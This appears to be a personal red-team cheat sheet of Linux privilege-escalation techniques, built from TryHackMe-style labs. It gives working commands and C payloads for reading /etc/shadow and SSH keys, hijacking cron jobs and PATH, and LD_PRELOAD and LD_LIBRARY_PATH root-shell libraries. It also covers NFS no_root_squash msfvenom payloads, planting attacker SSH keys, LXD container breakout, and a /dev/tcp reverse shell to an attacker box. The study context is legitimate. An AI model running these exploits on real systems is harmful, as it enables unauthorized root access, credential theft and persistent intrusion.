Linux

Gathering Info

whoami
id
groups
cat ~/.bash_history
uname -a

Check for passwords in environment variables

env

Find files

Files owned by your user

Victim

find / -user $USER 2>/dev/null

Files owned by group

Victim

find / -type f -group $GROUP 2>/dev/null

Find passwords

cat /etc/passwd
cat /etc/shadow
cat /var/www/html/wpconfig.php #Wordpress sites
/home/user/myvpn.ovpn #VPN. Look for auth-user-pass and find file it is pointed to.
find / -type f -name *.bak 2>/dev/null 
#Find files and exclude paths to reduce results
find / \( -path /lib -o -path /snap -o -path /etc/sane.d -o -path /etc/fonts -o -path /usr/share -o -path /etc/apache2 \) -prune -o -name "*.conf" -print 2>/dev/null

Victim

cat ~/.bash_history | grep -i passw 

SSH Keys
find / -name id_rsa 2> /dev/null
cat /backups/supersecretkeys/id_rsa

Weak File Permissions

Readable /etc/shadow

Weak File Permissions - Readable /etc/shadow

Writable /etc/shadow

Weak File Permissions - Writable /etc/shadow

Writable /etc/passwd

Weak File Permissions - Writable /etc/passwd

Cron Jobs

Finding & Comments
Example

Have permission to overwrite the contents of the file

Linux Privilege Escalation

Change path to a different file since it's not using absolute path

Linux Privilege Escalation

Victim

cat /etc/crontab

Possible other places crons are running

Victim

cat /etc/cron.d/*

Cron Jobs - File Permissions

Examples

Cron Jobs - File Permissions

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

View the contents of the system-wide crontab.

Victim

cat /etc/crontab

There should be two cron jobs scheduled to run every minute. One runs overwrite.sh, the other runs /usr/local/bin/compress.sh.

Locate the full path of the overwrite.sh file.

Victim

locate overwrite.sh

Note that the file is world-writable.

Victim

ls -l /usr/local/bin/overwrite.sh

Cron Jobs - PATH Environment Variable

Examples

Cron Jobs - PATH Environment Variable

View the contents of the system-wide crontab

Victim

cat /etc/crontab

Note that the PATH variable starts with /home/user which is our user's home directory. Create a file called overwrite.sh in your home directory with the following contents

overwrite.sh

#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash

Make sure that the file is executable

Victim

chmod +x /home/user/overwrite.sh

Wait for the cron job to run (should not take longer than a minute). Run the /tmp/rootbash command with -p to gain a shell running with root privileges:

Victim

/tmp/rootbash -p

Cron Jobs - Wildcards

Examples

Cron Jobs - Wildcards

View the contents of the other cron job script

Victim

cat /usr/local/bin/compress.sh

Note that the tar command is being run with a wildcard (*) in your home directory.

Sudo/SUID/Capabilities

Run all of these commands then check https://gtfobins.github.io/ . They may give different results

Check what can be run with NOPASSWD

Victim

sudo -l

Finding
Comments
Examples

yum

Privilege Escalation

Daily Bugle

anansi_util

Privilege Escalation

Brainpan 1

vi

BASH scripts

chmod

apache2

apache2

nmap

nmap

ftp

more

more

less

awk

awk

man

man

vim

find

Linux Privilege Escalation

iftop

iftop

sudo

cat

Brute ItDav

pkexec

Lian_Yu

nano

certutil

Read files

base64

base32

Read files

b3dr0ck

env

pico

flask

python3

tar

reboot

bash

ALL

fail2ban

exiftool

awk

Linux PrivEsc Arena

apache2

Linux PrivEsc Arena

zip

tee

ko file

SUID / SGID Executables - Known Exploits

Find all the SUID/SGID executables.

Victim

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Finding
Comments
Examples

exim

version 4.84-3

SUID / SGID Executables - Known Exploits

base64

Read files we shouldn't have access to read

Linux Privilege Escalation

find

Privilege Escalation

python3

SUID / SGID Executables - Shared Object Injection

SUID / SGID Executables - Shared Object Injection

SUID / SGID Executables - Environment Variables

SUID / SGID Executables - Environment Variables

SUID / SGID Executables - Abusing Shell Features

SUID / SGID Executables - Abusing Shell Features (#1)

SUID / SGID Executables - Abusing Shell Features (#2)

Sudo - Environment Variables

LD_LIBRARY_PATH

Examples

Sudo - Environment Variables

preload.c - code

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

library_path.c

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

Sudo can be configured to inherit certain environment variables from the user's environment. Check which environment variables are inherited (look for the env_keep options):

Victim

sudo -l

LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user's environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

Create a shared object using the code located at /home/user/tools/sudo/preload.c.

Victim

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c

LD_PRELOAD and LD_LIBRARY_PATH are both inherited from the user's environment. LD_PRELOAD loads a shared object before any others when a program is run. LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

Create a shared object using the code located at /home/user/tools/sudo/preload.c

Victim

sudo LD_PRELOAD=/tmp/preload.so /usr/bin/ftp

A root shell should spawn. Exit out of the shell before continuing. Depending on the program you chose, you may need to exit out of this as well.

Run ldd against the apache2 program file to see which shared libraries are used by the program.

Victim

ldd /usr/sbin/apache2

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c.

Victim

gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c

Create a shared object with the same name as one of the listed libraries (libcrypt.so.1) using the code located at /home/user/tools/sudo/library_path.c.

Victim

sudo LD_LIBRARY_PATH=/tmp apache2

LD_PRELOAD

Examples

Road

If LD_PRELOAD is set try below then running the script we can run with NOPASSWD

Victim

vi preload.c

preload.c - code

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

Victim

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so $NOPASSWD_SCRIPT_WE_CAN_ABUSE

Files with SUID-bit set

Victim

find / -perm -u=s -type f 2> /dev/null
Finding
Comments
Examples

setcap

If setcap is set that is very interesting checkout room. Could lead to priv esc. by setting getcap on other things.

Annie

Programs in strange locations

If there is a program running in a user home directory or somewhere strange, it may be worth investigating

Common Linux PrivescMadeye's Castle ContainMe

find

Can spawn shell

Boiler CTF

doas

Can read files or copy files

GLITCH

strings

Can read files

Jack-of-All-Trades

cputils

Can copy files

Olympus

tar

Can spawn shell

Skynet

grep

Read files

Getcap

Victim

getcap -r / 2>/dev/null
Finding
Comments
Examples

python

If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

Oh My WebServerLinux PrivEsc Arena

vim

Can spawn shell

Linux Privilege Escalation

perl

Can spawn shell

Wonderland

openssl

Can spawn shell

Mindgames

vim

Linux Privilege Escalation

ruby

Service Exploits

Finding
Comments
Examples

mysql

Service Exploits

PATH Variables

Examples

Look at the paths, below is an example of a cronjob. it first looks at /home/lachlan/bin before /bin and /usr/bin. therefore we can change pkill because it doesn't use the exact path in the cronjob. This means we can put a new file called /home/lachlan/bin/pkill with whatever we want and it will run as root.

Victim

cat /etc/crontab

Possible other places crons are running

Victim

cat /etc/cron.d/*

Victim(lachlan)

echo "bash -c 'bash -i >& /dev/tcp/$KALI/1338 0>&1'" > /home/lachlan/bin/pkill ; chmod  +x bin/pkill

Add path

Example

If a cron job is not specfiying the full path we may be able to change it to go towards another file.

Before we change the path we can see ls goes to /bin/ls

Now after running the below command ls is now directed to our script.

Victim

export PATH=/tmp:$PATH

Passwords & Keys

History Files

Examples

Passwords & Keys - History Files

Victim

cat ~/.*history | less

Config Files

Examples

Passwords & Keys - Config Files

Victim

cat /home/user/myvpn.ovpn

SSH Keys

Copy keys from Victim

Examples

Passwords & Keys - SSH Keys

Look for hidden files & directories in the system root.

Victim

cat /home/$USER/.ssh/$KEY

Copy the key over to your Kali box (it's easier to just view the contents of the $KEY file and copy/paste the key) and give it the correct permissions, otherwise your SSH client will refuse to use it.

Kali

chmod 600 $KEY
ssh -i $KEY -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostKeyAlgorithms=+ssh-rsa $USER@$VICTIM

Add Keys to Victim

Examples

Madeye's Castle

Kali

ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub

Victim

echo "$YOURKEY" >> /home/$USER/.ssh/authorized_keys

Kali

ssh $USER@$VICTIM

NFS

Examples

NFSLinux Privilege EscalationLinux PrivEsc Arena

Option #1

Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.

Check the NFS share configuration on the Debian VM.

Victim

cat /etc/exports

no_root_squash is present

Note that the /tmp share has root squashing disabled.

On your Kali box, switch to your root user if you are not already running as root.

Kali

sudo su

Using Kali's root user, create a mount point on your Kali box and mount the /tmp share (update the IP accordingly).

Kali

mkdir /tmp/nfs
mount -o rw,vers=3 $VICTIM:/tmp /tmp/nfs

Still using Kali's root user, generate a payload using msfvenom and save it to the mounted share (this payload simply calls /bin/bash).

Kali

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

Still using Kali's root user, make the file executable and set the SUID permission.

Kali

chmod +xs /tmp/nfs/shell.elf

Back on the Debian VM, as the low privileged user account, execute the file to gain a root shell.

Victim

/tmp/shell.elf

Option #2

Victim

showmount -e $VICTIM
cat /etc/exports

Kali

mkdir /root/attack
mount -o rw $VICTIM:/home/ubuntu/sharedfolder /root/attack
subl /root/attack/nfc.c

nfc.c

int main()
{ setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

Kali

gcc /root/attack/nfc.c -o /root/attack/nfc -w
chmod +s /root/attack/nfc

Victim

cd /home/ubuntu/sharedfolder
./nfc

Kernel Exploits

Examples

Kernel Exploits

Writable Files

Files where group permissions equal to "writable"

find / -type f -perm /g=w -exec ls -l {} + 2> /dev/null 
find / -writable 2>/dev/null

Ports

May be able to find open ports only accessible internally. 

ss -ltp
netstat -tuan

LXD

Examples

AnonymousGamingServer

Resources

https://www.hackingarticles.in/lxd-privilege-escalation/

Victim

id

Kali

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81

Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.

Victim

cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

PolKit

Examples: Hip Flask

See if it exists.

Kali

apt list --upgradeable

Check out this room for more details

Monitor Processes

Examples

Enumeration

Victim

ps axf

PSPY

script that can monitor linux processes without root access

Kali

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32 
python2 -m SimpleHTTPServer 81

Victim

wget http://$KALI:81/pspy32 
chmod +x pspy32 
./pspy32

Docker Breakout / Privilege Escalation

Examples

Container Vulnerabilities

UltraTech

dogcat

The Marketplace

Chill Hack

The Docker Rodeo

The Great Escape

Umbrella

Copy Material from here:

https://tryhackme.com/room/linprivesc

Automated Enumeration Tools

Name
Link
Examples

LinPeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Internal

LinEnum

https://github.com/rebootuser/LinEnum

LES (Linux Exploit Suggester)

https://github.com/mzet-/linux-exploit-suggester

Linux Smart Enumeration

https://github.com/diego-treitos/linux-smart-enumeration

Linux Priv Checker

https://github.com/linted/linuxprivchecker

Room with other things to try

https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/linux-privesc

Other Cheat sheets

https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics

PreviousPrivilege EscalationNextScripts

Last updated